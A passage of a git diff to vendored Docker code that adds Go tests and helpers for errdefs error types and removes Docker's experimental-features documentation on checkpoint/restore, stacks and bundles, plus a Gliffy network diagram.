error, got %T", errTest) + } + e := Unknown(errTest) + if !IsUnknown(e) { + t.Fatalf("expected unknown error, got %T", e) + } + if cause := e.(causal).Cause(); cause != errTest { + t.Fatalf("causual should be errTest, got: %v", cause) + } +} + +func TestCancelled(t *testing.T) { + if IsCancelled(errTest) { + t.Fatalf("did not expect cancelled error, got %T", errTest) + } + e := Cancelled(errTest) + if !IsCancelled(e) { + t.Fatalf("expected cancelled error, got %T", e) + } + if cause := e.(causal).Cause(); cause != errTest { + t.Fatalf("causual should be errTest, got: %v", cause) + } +} + +func TestDeadline(t *testing.T) { + if IsDeadline(errTest) { + t.Fatalf("did not expect deadline error, got %T", errTest) + } + e := Deadline(errTest) + if !IsDeadline(e) { + t.Fatalf("expected deadline error, got %T", e) + } + if cause := e.(causal).Cause(); cause != errTest { + t.Fatalf("causual should be errTest, got: %v", cause) + } +} + +func TestDataLoss(t *testing.T) { + if IsDataLoss(errTest) { + t.Fatalf("did not expect data loss error, got %T", errTest) + } + e := DataLoss(errTest) + if !IsDataLoss(e) { + t.Fatalf("expected data loss error, got %T", e) + } + if cause := e.(causal).Cause(); cause != errTest { + t.Fatalf("causual should be errTest, got: %v", cause) + } +} + +func TestUnavailable(t *testing.T) { + if IsUnavailable(errTest) { + t.Fatalf("did not expect unavaillable error, got %T", errTest) + } + e := Unavailable(errTest) + if !IsUnavailable(e) { + t.Fatalf("expected unavaillable error, got %T", e) + } + if cause := e.(causal).Cause(); cause != errTest { + t.Fatalf("causual should be errTest, got: %v", cause) + } +} + +func TestSystem(t *testing.T) { + if IsSystem(errTest) { + t.Fatalf("did not expect system error, got %T", errTest) + } + e := System(errTest) + if !IsSystem(e) { + t.Fatalf("expected system error, got %T", e) + } + if cause := e.(causal).Cause(); cause != errTest { + t.Fatalf("causual should be errTest, got: %v", cause) + } +} diff --git a/vendor/github.com/docker/docker/errdefs/is.go b/vendor/github.com/docker/docker/errdefs/is.go new file mode 100644 index 0000000000..e0513331bb --- /dev/null +++ b/vendor/github.com/docker/docker/errdefs/is.go @@ -0,0 +1,114 @@ +package errdefs // import "github.com/docker/docker/errdefs" + +type causer interface { + Cause() error +} + +func getImplementer(err error) error { + switch e := err.(type) { + case + ErrNotFound, + ErrInvalidParameter, + ErrConflict, + ErrUnauthorized, + ErrUnavailable, + ErrForbidden, + ErrSystem, + ErrNotModified, + ErrAlreadyExists, + ErrNotImplemented, + ErrCancelled, + ErrDeadline, + ErrDataLoss, + ErrUnknown: + return err + case causer: + return getImplementer(e.Cause()) + default: + return err + } +} + +// IsNotFound returns if the passed in error is an ErrNotFound +func IsNotFound(err error) bool { + _, ok := getImplementer(err).(ErrNotFound) + return ok +} + +// IsInvalidParameter returns if the passed in error is an ErrInvalidParameter +func IsInvalidParameter(err error) bool { + _, ok := getImplementer(err).(ErrInvalidParameter) + return ok +} + +// IsConflict returns if the passed in error is an ErrConflict +func IsConflict(err error) bool { + _, ok := getImplementer(err).(ErrConflict) + return ok +} + +// IsUnauthorized returns if the passed in error is an ErrUnauthorized +func IsUnauthorized(err error) bool { + _, ok := getImplementer(err).(ErrUnauthorized) + return ok +} + +// IsUnavailable returns if the passed in error is an ErrUnavailable +func IsUnavailable(err error) bool { + _, ok := getImplementer(err).(ErrUnavailable) + return ok +} + +// IsForbidden returns if the passed in error is an ErrForbidden +func IsForbidden(err error) bool { + _, ok := getImplementer(err).(ErrForbidden) + return ok +} + +// IsSystem returns if the passed in error is an ErrSystem +func IsSystem(err error) bool { + _, ok := getImplementer(err).(ErrSystem) + return ok +} + +// IsNotModified returns if the passed in error is a NotModified error +func IsNotModified(err error) bool { + _, ok := getImplementer(err).(ErrNotModified) + return ok +} + +// IsAlreadyExists returns if the passed in error is a AlreadyExists error +func IsAlreadyExists(err error) bool { + _, ok := getImplementer(err).(ErrAlreadyExists) + return ok +} + +// IsNotImplemented returns if the passed in error is an ErrNotImplemented +func IsNotImplemented(err error) bool { + _, ok := getImplementer(err).(ErrNotImplemented) + return ok +} + +// IsUnknown returns if the passed in error is an ErrUnknown +func IsUnknown(err error) bool { + _, ok := getImplementer(err).(ErrUnknown) + return ok +} + +// IsCancelled returns if the passed in error is an ErrCancelled +func IsCancelled(err error) bool { + _, ok := getImplementer(err).(ErrCancelled) + return ok +} + +// IsDeadline returns if the passed in error is an ErrDeadline +func IsDeadline(err error) bool { + _, ok := getImplementer(err).(ErrDeadline) + return ok +} + +// IsDataLoss returns if the passed in error is an ErrDataLoss +func IsDataLoss(err error) bool { + _, ok := getImplementer(err).(ErrDataLoss) + return ok +} diff --git a/vendor/github.com/docker/docker/experimental/README.md b/vendor/github.com/docker/docker/experimental/README.md deleted file mode 100644 index b57a5d1294..0000000000 --- a/vendor/github.com/docker/docker/experimental/README.md +++ /dev/null @@ -1,44 +0,0 @@ -# Docker Experimental Features - -This page contains a list of features in the Docker engine which are -experimental. Experimental features are **not** ready for production. They are -provided for test and evaluation in your sandbox environments. - -The information below describes each feature and the GitHub pull requests and -issues associated with it. If necessary, links are provided to additional -documentation on an issue. As an active Docker user and community member, -please feel free to provide any feedback on these features you wish. - -## Use Docker experimental - -Experimental features are now included in the standard Docker binaries as of -version 1.13.0. -For enabling experimental features, you need to start the Docker daemon with -`--experimental` flag. -You can also enable the daemon flag via `/etc/docker/daemon.json`. e.g. - -```json -{ - "experimental": true -} -``` - -Then make sure the experimental flag is enabled: - -```bash -$ docker version -f '{{.Server.Experimental}}' -true -``` - -## Current experimental features - - * [External graphdriver plugins](../docs/extend/plugins_graphdriver.md) - * [Ipvlan Network Drivers](vlan-networks.md) - * [Docker Stacks and Distributed Application Bundles](docker-stacks-and-bundles.md) - * [Checkpoint & Restore](checkpoint-restore.md) - -## How to comment on an experimental feature - -Each feature's documentation includes a list of proposal pull requests or PRs associated with the feature. If you want to comment on or suggest a change to a feature, please add it to the existing feature PR. - -Issues or problems with a feature? Inquire for help on the `#docker` IRC channel or on the [Docker Google group](https://groups.google.com/forum/#!forum/docker-user). diff --git a/vendor/github.com/docker/docker/experimental/checkpoint-restore.md b/vendor/github.com/docker/docker/experimental/checkpoint-restore.md deleted file mode 100644 index 7e609b60ec..0000000000 --- a/vendor/github.com/docker/docker/experimental/checkpoint-restore.md +++ /dev/null @@ -1,88 +0,0 @@ -# Docker Checkpoint & Restore - -Checkpoint & Restore is a new feature that allows you to freeze a running -container by checkpointing it, which turns its state into a collection of files -on disk. Later, the container can be restored from the point it was frozen. - -This is accomplished using a tool called [CRIU](http://criu.org), which is an -external dependency of this feature. A good overview of the history of -checkpoint and restore in Docker is available in this -[Kubernetes blog post](http://blog.kubernetes.io/2015/07/how-did-quake-demo-from-dockercon-work.html). - -## Installing CRIU - -If you use a Debian system, you can add the CRIU PPA and install with apt-get -[from the criu launchpad](https://launchpad.net/~criu/+archive/ubuntu/ppa). - -Alternatively, you can [build CRIU from source](http://criu.org/Installation). - -You need at least version 2.0 of CRIU to run checkpoint/restore in Docker. - -## Use cases for checkpoint & restore - -This feature is currently focused on single-host use cases for checkpoint and -restore. Here are a few: - -- Restarting the host machine without stopping/starting containers -- Speeding up the start time of slow start applications -- "Rewinding" processes to an earlier point in time -- "Forensic debugging" of running processes - -Another primary use case of checkpoint & restore outside of Docker is the live -migration of a server from one machine to another. This is possible with the -current implementation, but not currently a priority (and so the workflow is -not optimized for the task). - -## Using checkpoint & restore - -A new top level command `docker checkpoint` is introduced, with three subcommands: -- `create` (creates a new checkpoint) -- `ls` (lists existing checkpoints) -- `rm` (deletes an existing checkpoint) - -Additionally, a `--checkpoint` flag is added to the container start command. - -The options for checkpoint create: - - Usage: docker checkpoint create [OPTIONS] CONTAINER CHECKPOINT - - Create a checkpoint from a running container - - --leave-running=false Leave the container running after checkpoint - --checkpoint-dir Use a custom checkpoint storage directory - -And to restore a container: - - Usage: docker start --checkpoint CHECKPOINT_ID [OTHER OPTIONS] CONTAINER - - -A simple example of using checkpoint & restore on a container: - - $ docker run --security-opt=seccomp:unconfined --name cr -d busybox /bin/sh -c 'i=0; while true; do echo $i; i=$(expr $i + 1); sleep 1; done' - > abc0123 - - $ docker checkpoint create cr checkpoint1 - - # - $ docker start --checkpoint checkpoint1 cr - > abc0123 - -This process just logs an incrementing counter to stdout. If you `docker logs` -in between running/checkpoint/restoring you should see that the counter -increases while the process is running, stops while it's checkpointed, and -resumes from the point it left off once you restore. - -## Current limitation - -seccomp is only supported by CRIU in very up to date kernels. - -External terminal (i.e. `docker run -t ..`) is not supported at the moment. -If you try to create a checkpoint for a container with an external terminal, -it would fail: - - $ docker checkpoint create cr checkpoint1 - Error response from daemon: Cannot checkpoint container c1: rpc error: code = 2 desc = exit status 1: "criu failed: type NOTIFY errno 0\nlog file: /var/lib/docker/containers/eb62ebdbf237ce1a8736d2ae3c7d88601fc0a50235b0ba767b559a1f3c5a600b/checkpoints/checkpoint1/criu.work/dump.log\n" - - $ cat /var/lib/docker/containers/eb62ebdbf237ce1a8736d2ae3c7d88601fc0a50235b0ba767b559a1f3c5a600b/checkpoints/checkpoint1/criu.work/dump.log - Error (mount.c:740): mnt: 126:./dev/console doesn't have a proper root mount - diff --git a/vendor/github.com/docker/docker/experimental/docker-stacks-and-bundles.md b/vendor/github.com/docker/docker/experimental/docker-stacks-and-bundles.md deleted file mode 100644 index b777c3919c..0000000000 --- a/vendor/github.com/docker/docker/experimental/docker-stacks-and-bundles.md +++ /dev/null @@ -1,202 +0,0 @@ -# Docker Stacks and Distributed Application Bundles - -## Overview - -Docker Stacks and Distributed Application Bundles are experimental features -introduced in Docker 1.12 and Docker Compose 1.8, alongside the concept of -swarm mode, and Nodes and Services in the Engine API. - -A Dockerfile can be built into an image, and containers can be created from -that image. Similarly, a docker-compose.yml can be built into a **distributed -application bundle**, and **stacks** can be created from that bundle. In that -sense, the bundle is a multi-services distributable image format. - -As of Docker 1.12 and Compose 1.8, the features are experimental. Neither -Docker Engine nor the Docker Registry support distribution of bundles. - -## Producing a bundle - -The easiest way to produce a bundle is to generate it using `docker-compose` -from an existing `docker-compose.yml`. Of course, that's just *one* possible way -to proceed, in the same way that `docker build` isn't the only way to produce a -Docker image. - -From `docker-compose`: - -```bash -$ docker-compose bundle -WARNING: Unsupported key 'network_mode' in services.nsqd - ignoring -WARNING: Unsupported key 'links' in services.nsqd - ignoring -WARNING: Unsupported key 'volumes' in services.nsqd - ignoring -[...] -Wrote bundle to vossibility-stack.dab -``` - -## Creating a stack from a bundle - -A stack is created using the `docker deploy` command: - -```bash -# docker deploy --help - -Usage: docker deploy [OPTIONS] STACK - -Create and update a stack from a Distributed Application Bundle (DAB) - -Options: - --file string Path to a Distributed Application Bundle file (Default: STACK.dab) - --help Print usage - --with-registry-auth Send registry authentication details to Swarm agents -``` - -Let's deploy the stack created before: - -```bash -# docker deploy vossibility-stack -Loading bundle from vossibility-stack.dab -Creating service vossibility-stack_elasticsearch -Creating service vossibility-stack_kibana -Creating service vossibility-stack_logstash -Creating service vossibility-stack_lookupd -Creating service vossibility-stack_nsqd -Creating service vossibility-stack_vossibility-collector -``` - -We can verify that services were correctly created: - -```bash -$ docker service ls -ID NAME MODE REPLICAS IMAGE -29bv0vnlm903 vossibility-stack_lookupd replicated 1/1 nsqio/nsq@sha256:eeba05599f31eba418e96e71e0984c3dc96963ceb66924dd37a47bf7ce18a662 -4awt47624qwh vossibility-stack_nsqd replicated 1/1 nsqio/nsq@sha256:eeba05599f31eba418e96e71e0984c3dc96963ceb66924dd37a47bf7ce18a662 -4tjx9biia6fs vossibility-stack_elasticsearch replicated 1/1 elasticsearch@sha256:12ac7c6af55d001f71800b83ba91a04f716e58d82e748fa6e5a7359eed2301aa -7563uuzr9eys vossibility-stack_kibana replicated 1/1 kibana@sha256:6995a2d25709a62694a937b8a529ff36da92ebee74bafd7bf00e6caf6db2eb03 -9gc5m4met4he vossibility-stack_logstash replicated 1/1 logstash@sha256:2dc8bddd1bb4a5a34e8ebaf73749f6413c101b2edef6617f2f7713926d2141fe -axqh55ipl40h vossibility-stack_vossibility-collector replicated 1/1 icecrime/vossibility-collector@sha256:f03f2977203ba6253988c18d04061c5ec7aab46bca9dfd89a9a1fa4500989fba -``` - -## Managing stacks - -Stacks are managed using the `docker stack` command: - -```bash -# docker stack --help - -Usage: docker stack COMMAND - -Manage Docker stacks - -Options: - --help Print usage - -Commands: - config Print the stack configuration - deploy Create and update a stack - ls List stacks - rm Remove the stack - services List the services in the stack - tasks List the tasks in the stack - -Run 'docker stack COMMAND --help' for more information on a command. -``` - -## Bundle file format - -Distributed application bundles are described in a JSON format. When bundles -are persisted as files, the file extension is `.dab` (Docker 1.12RC2 tools use -`.dsb` for the file extension—this will be updated in the next release client). - -A bundle has two top-level fields: `version` and `services`. The version used -by Docker 1.12 tools is `0.1`. - -`services` in the bundle are the services that comprise the app. They -correspond to the new `Service` object introduced in the 1.12 Docker Engine API. - -A service has the following fields: - -
-
- Image (required) string -
-
- The image that the service will run. Docker images should be referenced - with full content hash to fully specify the deployment artifact for the - service. Example: - postgres@sha256:f76245b04ddbcebab5bb6c28e76947f49222c99fec4aadb0bb - 1c24821a 9e83ef -
-
- Command []string -
-
- Command to run in service containers. -
-
- Args []string -
-
- Arguments passed to the service containers. -
-
- Env []string -
-
- Environment variables. -
-
- Labels map[string]string -
-
- Labels used for setting meta data on services. -
-
- Ports []Port -
-
- Service ports (composed of Port (int) and - Protocol (string). A service description can - only specify the container port to be exposed. These ports can be - mapped on runtime hosts at the operator's discretion. -
- -
- WorkingDir string -
-
- Working directory inside the service containers. -
- -
- User string -
-
- Username or UID (format: <name|uid>[:<group|gid>]). -
- -
- Networks []string -
-
- Networks that the service containers should be connected to. An entity - deploying a bundle should create networks as needed. -
-
- -The following is an example of bundlefile with two services: - -```json -{ - "Version": "0.1", - "Services": { - "redis": { - "Image": "redis@sha256:4b24131101fa0117bcaa18ac37055fffd9176aa1a240392bb8ea85e0be50f2ce", - "Networks": ["default"] - }, - "web": { - "Image": "dockercloud/hello-world@sha256:fe79a2cfbd17eefc344fb8419420808df95a1e22d93b7f621a7399fd1e9dca1d", - "Networks": ["default"], - "User": "web" - } - } -} -``` diff --git a/vendor/github.com/docker/docker/experimental/images/ipvlan-l3.gliffy b/vendor/github.com/docker/docker/experimental/images/ipvlan-l3.gliffy deleted file mode 100644 index bf0512af76..0000000000 --- a/vendor/github.com/docker/docker/experimental/images/ipvlan-l3.gliffy +++ /dev/null @@ -1 +0,0 @@ -{"contentType":"application/gliffy+json","version":"1.3","stage":{"background":"#FFFFFF","width":447,"height":422,"nodeIndex":326,"autoFit":true,"exportBorder":false,"gridOn":true,"snapToGrid":false,"drawingGuidesOn":false,"pageBreaksOn":false,"printGridOn":false,"printPaper":"LETTER","printShrinkToFit":false,"printPortrait":true,"maxWidth":5000,"maxHeight":5000,"themeData":{"uid":"com.gliffy.theme.beach_day","name":"Beach Day","shape":{"primary":{"strokeWidth":2,"strokeColor":"#00A4DA","fillColor":"#AEE4F4","gradient":false,"dropShadow":false,"opacity":1,"text":{"color":"#004257"}},"secondary":{"strokeWidth":2,"strokeColor":"#CDB25E","fillColor":"#EACF81","gradient":false,"dropShadow":false,"opacity":1,"text":{"color":"#332D1A"}},"tertiary":{"strokeWidth":2,"strokeColor":"#FFBE00","fillColor":"#FFF1CB","gradient":false,"dropShadow":false,"opacity":1,"text":{"color":"#000000"}},"highlight":{"strokeWidth":2,"strokeColor":"#00A4DA","fillColor":"#00A4DA","gradient":false,"dropShadow":false,"opacity":1,"text":{"color":"#ffffff"}}},"line":{"strokeWidth":2,"strokeColor":"#00A4DA","fillColor":"none","arrowType":2,"interpolationType":"quadratic","cornerRadius":0,"text":{"color":"#002248"}},"text":{"color":"#002248"},"stage":{"color":"#FFFFFF"}},"viewportType":"default","fitBB":{"min":{"x":9,"y":10.461511948529278},"max":{"x":447,"y":421.5}},"printModel":{"pageSize":"a4","portrait":false,"fitToOnePage":false,"displayPageBreaks":false},"objects":[{"x":12.0,"y":200.0,"rotation":0.0,"id":276,"width":434.00000000000006,"height":197.0,"uid":"com.gliffy.shape.basic.basic_v1.default.round_rectangle","order":10,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Shape","Shape":{"tid":"com.gliffy.stencil.round_rectangle.basic_v1","strokeWidth":2.0,"strokeColor":"#434343","fillColor":"#c5e4fc","gradient":false,"dashStyle":null,"dropShadow":false,"state":0,"opacity":0.93,"shadowX":0.0,"shadowY":0.0}},"linkMap":[],"children":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":275.0,"y":8.93295288085936,"rotation":0.0,"id":269,"width":100.0,"height":100.0,"uid":"com.gliffy.shape.uml.uml_v2.sequence.anchor_line","order":14,"lockAspectRatio":false,"lockShape":false,"constraints":{"constraints":[],"startConstraint":{"type":"StartPositionConstraint","StartPositionConstraint":{"nodeId":272,"py":0.5,"px":0.5}},"endConstraint":{"type":"EndPositionConstraint","EndPositionConstraint":{"nodeId":290,"py":1.0,"px":0.7071067811865476}}},"graphic":{"type":"Line","Line":{"strokeWidth":2.0,"strokeColor":"#000000","fillColor":"none","dashStyle":null,"startArrow":0,"endArrow":0,"startArrowRotation":"auto","endArrowRotation":"auto","interpolationType":"linear","cornerRadius":null,"controlPath":[[82.0,295.5670471191406],[-4.628896294384617,211.06704711914062]],"lockSegments":{},"ortho":false}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":285.0,"y":18.93295288085936,"rotation":0.0,"id":268,"width":100.0,"height":100.0,"uid":"com.gliffy.shape.uml.uml_v2.sequence.anchor_line","order":15,"lockAspectRatio":false,"lockShape":false,"constraints":{"constraints":[],"startConstraint":{"type":"StartPositionConstraint","StartPositionConstraint":{"nodeId":316,"py":0.5,"px":0.5}},"endConstraint":{"type":"EndPositionConstraint","EndPositionConstraint":{"nodeId":290,"py":0.9999999999999996,"px":0.29289321881345254}}},"graphic":{"type":"Line","Line":{"strokeWidth":2.0,"strokeColor":"#000000","fillColor":"none","dashStyle":null,"startArrow":0,"endArrow":0,"startArrowRotation":"auto","endArrowRotation":"auto","interpolationType":"linear","cornerRadius":null,"controlPath":[[-204.0,285.5670471191406],[-100.37110370561533,201.06704711914062]],"lockSegments":{},"ortho":false}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":8.0,"y":203.5,"rotation":0.0,"id":267,"width":116.0,"height":16.0,"uid":"com.gliffy.shape.basic.basic_v1.default.text","order":16,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Text","Text":{"overflow":"none","paddingTop":2,"paddingRight":2,"paddingBottom":2,"paddingLeft":2,"outerPaddingTop":6,"outerPaddingRight":6,"outerPaddingBottom":2,"outerPaddingLeft":6,"type":"fixed","lineTValue":null,"linePerpValue":null,"cardinalityType":null,"html":"

Docker Host

","tid":null,"valign":"middle","vposition":"none","hposition":"none"}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":10.0,"y":28.93295288085936,"rotation":0.0,"id":278,"width":100.0,"height":100.0,"uid":"com.gliffy.shape.uml.uml_v2.sequence.anchor_line","order":17,"lockAspectRatio":false,"lockShape":false,"constraints":{"constraints":[],"startConstraint":{"type":"StartPositionConstraint","StartPositionConstraint":{"nodeId":290,"py":0.5,"px":0.5}},"endConstraint":{"type":"EndPositionConstraint","EndPositionConstraint":{"nodeId":246,"py":0.5,"px":0.5}}},"graphic":{"type":"Line","Line":{"strokeWidth":2.0,"strokeColor":"#000000","fillColor":"none","dashStyle":null,"startArrow":0,"endArrow":0,"startArrowRotation":"auto","endArrowRotation":"auto","interpolationType":"linear","cornerRadius":null,"controlPath":[[217.5,167.06704711914062],[219.11774189711457,53.02855906766992]],"lockSegments":{},"ortho":false}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":57.51435447730654,"y":10.461511948529278,"rotation":0.0,"id":246,"width":343.20677483961606,"height":143.0,"uid":"com.gliffy.shape.cisco.cisco_v1.storage.cloud","order":18,"lockAspectRatio":true,"lockShape":false,"graphic":{"type":"Shape","Shape":{"tid":"com.gliffy.stencil.cisco.cisco_v1.storage.cloud","strokeWidth":2.0,"strokeColor":"#333333","fillColor":"#434343","gradient":false,"dashStyle":null,"dropShadow":false,"state":0,"opacity":1.0,"shadowX":0.0,"shadowY":0.0}},"linkMap":[],"children":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":106.0,"y":55.19999694824217,"rotation":0.0,"id":262,"width":262.0,"height":75.0,"uid":"com.gliffy.shape.basic.basic_v1.default.text","order":22,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Text","Text":{"overflow":"none","paddingTop":2,"paddingRight":2,"paddingBottom":2,"paddingLeft":2,"outerPaddingTop":6,"outerPaddingRight":6,"outerPaddingBottom":2,"outerPaddingLeft":6,"type":"fixed","lineTValue":null,"linePerpValue":null,"cardinalityType":null,"html":"

Unless notified about the container networks, the physical network does not have a route to their subnets

Who has 10.16.20.0/24?

Who has 10.1.20.0/24?

","tid":null,"valign":"middle","vposition":"none","hposition":"none"}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":7.0,"y":403.5,"rotation":0.0,"id":282,"width":442.0,"height":18.0,"uid":"com.gliffy.shape.basic.basic_v1.default.text","order":23,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Text","Text":{"overflow":"none","paddingTop":2,"paddingRight":2,"paddingBottom":2,"paddingLeft":2,"outerPaddingTop":6,"outerPaddingRight":6,"outerPaddingBottom":2,"outerPaddingLeft":6,"type":"fixed","lineTValue":null,"linePerpValue":null,"cardinalityType":null,"html":"

Containers can be on different subnets and reach each other

","tid":null,"valign":"middle","vposition":"none","hposition":"none"}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":106.0,"y":252.5,"rotation":0.0,"id":288,"width":238.0,"height":22.0,"uid":"com.gliffy.shape.basic.basic_v1.default.text","order":24,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Text","Text":{"overflow":"none","paddingTop":2,"paddingRight":2,"paddingBottom":2,"paddingLeft":2,"outerPaddingTop":6,"outerPaddingRight":6,"outerPaddingBottom":2,"outerPaddingLeft":6,"type":"fixed","lineTValue":null,"linePerpValue":null,"cardinalityType":null,"html":"

 Ipvlan L3 Mode

","tid":null,"valign":"middle","vposition":"none","hposition":"none"}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":124.0,"y":172.0,"rotation":0.0,"id":290,"width":207.0,"height":48.0,"uid":"com.gliffy.shape.basic.basic_v1.default.round_rectangle","order":25,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Shape","Shape":{"tid":"com.gliffy.stencil.round_rectangle.basic_v1","strokeWidth":1.0,"strokeColor":"#434343","fillColor":"#cccccc","gradient":false,"dashStyle":null,"dropShadow":true,"state":0,"opacity":1.0,"shadowX":4.0,"shadowY":4.0}},"linkMap":[],"children":[{"x":3.568965517241383,"y":0.0,"rotation":0.0,"id":291,"width":199.86206896551747,"height":42.0,"uid":null,"order":27,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Text","Text":{"overflow":"none","paddingTop":8,"paddingRight":8,"paddingBottom":8,"paddingLeft":8,"outerPaddingTop":6,"outerPaddingRight":6,"outerPaddingBottom":2,"outerPaddingLeft":6,"type":"fixed","lineTValue":null,"linePerpValue":null,"cardinalityType":null,"html":"

Eth0

192.168.50.10/24

Parent interface acts as a Router

","tid":null,"valign":"middle","vposition":"none","hposition":"none"}},"hidden":false,"layerId":"9wom3rMkTrb3"}],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":29.0,"y":358.1999969482422,"rotation":0.0,"id":304,"width":390.99999999999994,"height":32.0,"uid":"com.gliffy.shape.basic.basic_v1.default.text","order":29,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Text","Text":{"overflow":"none","paddingTop":2,"paddingRight":2,"paddingBottom":2,"paddingLeft":2,"outerPaddingTop":6,"outerPaddingRight":6,"outerPaddingBottom":2,"outerPaddingLeft":6,"type":"fixed","lineTValue":null,"linePerpValue":null,"cardinalityType":null,"html":"

All containers can ping each other without a router if

they share the same parent interface (example eth0)

","tid":null,"valign":"middle","vposition":"none","hposition":"none"}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":24.0,"y":276.0,"rotation":0.0,"id":320,"width":134.0,"height":77.0,"uid":"com.gliffy.shape.basic.basic_v1.default.group","order":48,"lockAspectRatio":false,"lockShape":false,"children":[{"x":0.0,"y":0.0,"rotation":0.0,"id":316,"width":114.0,"height":57.0,"uid":"com.gliffy.shape.basic.basic_v1.default.round_rectangle","order":44,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Shape","Shape":{"tid":"com.gliffy.stencil.round_rectangle.basic_v1","strokeWidth":1.0,"strokeColor":"#434343","fillColor":"#4cacf5","gradient":false,"dashStyle":null,"dropShadow":false,"state":0,"opacity":0.97,"shadowX":0.0,"shadowY":0.0}},"linkMap":[],"children":[{"x":2.279999999999999,"y":0.0,"rotation":0.0,"id":317,"width":109.44000000000001,"height":43.0,"uid":null,"order":47,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Text","Text":{"overflow":"none","paddingTop":8,"paddingRight":8,"paddingBottom":8,"paddingLeft":8,"outerPaddingTop":6,"outerPaddingRight":6,"outerPaddingBottom":2,"outerPaddingLeft":6,"type":"fixed","lineTValue":null,"linePerpValue":null,"cardinalityType":null,"html":"

Container(s)

Eth0 

172.16.20.x/24

","tid":null,"valign":"middle","vposition":"none","hposition":"none"}},"hidden":false,"layerId":"9wom3rMkTrb3"}],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":10.0,"y":10.0,"rotation":0.0,"id":318,"width":114.0,"height":57.0,"uid":"com.gliffy.shape.basic.basic_v1.default.round_rectangle","order":42,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Shape","Shape":{"tid":"com.gliffy.stencil.round_rectangle.basic_v1","strokeWidth":1.0,"strokeColor":"#434343","fillColor":"#4cacf5","gradient":false,"dashStyle":null,"dropShadow":false,"state":0,"opacity":0.97,"shadowX":0.0,"shadowY":0.0}},"linkMap":[],"children":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":20.0,"y":20.0,"rotation":0.0,"id":319,"width":114.0,"height":57.0,"uid":"com.gliffy.shape.basic.basic_v1.default.round_rectangle","order":40,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Shape","Shape":{"tid":"com.gliffy.stencil.round_rectangle.basic_v1","strokeWidth":1.0,"strokeColor":"#434343","fillColor":"#4cacf5","gradient":false,"dashStyle":null,"dropShadow":false,"state":0,"opacity":0.97,"shadowX":0.0,"shadowY":0.0}},"linkMap":[],"children":[],"hidden":false,"layerId":"9wom3rMkTrb3"}],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":300.0,"y":276.0,"rotation":0.0,"id":321,"width":134.0,"height":77.0,"uid":"com.gliffy.shape.basic.basic_v1.default.group","order":49,"lockAspectRatio":false,"lockShape":false,"children":[{"x":0.0,"y":0.0,"rotation":0.0,"id":272,"width":114.0,"height":57.0,"uid":"com.gliffy.shape.basic.basic_v1.default.round_rectangle","order":35,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Shape","Shape":{"tid":"com.gliffy.stencil.round_rectangle.basic_v1","strokeWidth":1.0,"strokeColor":"#434343","fillColor":"#4cacf5","gradient":false,"dashStyle":null,"dropShadow":false,"state":0,"opacity":0.97,"shadowX":0.0,"shadowY":0.0}},"linkMap":[],"children":[{"x":2.279999999999999,"y":0.0,"rotation":0.0,"id":273,"width":109.44000000000001,"height":44.0,"uid":null,"order":38,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Text","Text":{"overflow":"none","paddingTop":8,"paddingRight":8,"paddingBottom":8,"paddingLeft":8,"outerPaddingTop":6,"outerPaddingRight":6,"outerPaddingBottom":2,"outerPaddingLeft":6,"type":"fixed","lineTValue":null,"linePerpValue":null,"cardinalityType":null,"html":"

Container(s)

Eth0 10.1.20.x/24

","tid":null,"valign":"middle","vposition":"none","hposition":"none"}},"hidden":false,"layerId":"9wom3rMkTrb3"}],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":10.0,"y":10.0,"rotation":0.0,"id":310,"width":114.0,"height":57.0,"uid":"com.gliffy.shape.basic.basic_v1.default.round_rectangle","order":33,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Shape","Shape":{"tid":"com.gliffy.stencil.round_rectangle.basic_v1","strokeWidth":1.0,"strokeColor":"#434343","fillColor":"#4cacf5","gradient":false,"dashStyle":null,"dropShadow":false,"state":0,"opacity":0.97,"shadowX":0.0,"shadowY":0.0}},"linkMap":[],"children":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":20.0,"y":20.0,"rotation":0.0,"id":312,"width":114.0,"height":57.0,"uid":"com.gliffy.shape.basic.basic_v1.default.round_rectangle","order":31,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Shape","Shape":{"tid":"com.gliffy.stencil.round_rectangle.basic_v1","strokeWidth":1.0,"strokeColor":"#434343","fillColor":"#4cacf5","gradient":false,"dashStyle":null,"dropShadow":false,"state":0,"opacity":0.97,"shadowX":0.0,"shadowY":0.0}},"linkMap":[],"children":[],"hidden":false,"layerId":"9wom3rMkTrb3"}],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":368.0,"y":85.93295288085938,"rotation":0.0,"id":322,"width":100.0,"height":100.0,"uid":"com.gliffy.shape.uml.uml_v2.sequence.anchor_line","order":50,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Line","Line":{"strokeWidth":2.0,"strokeColor":"#434343","fillColor":"none","dashStyle":"4.0,4.0","startArrow":2,"endArrow":2,"startArrow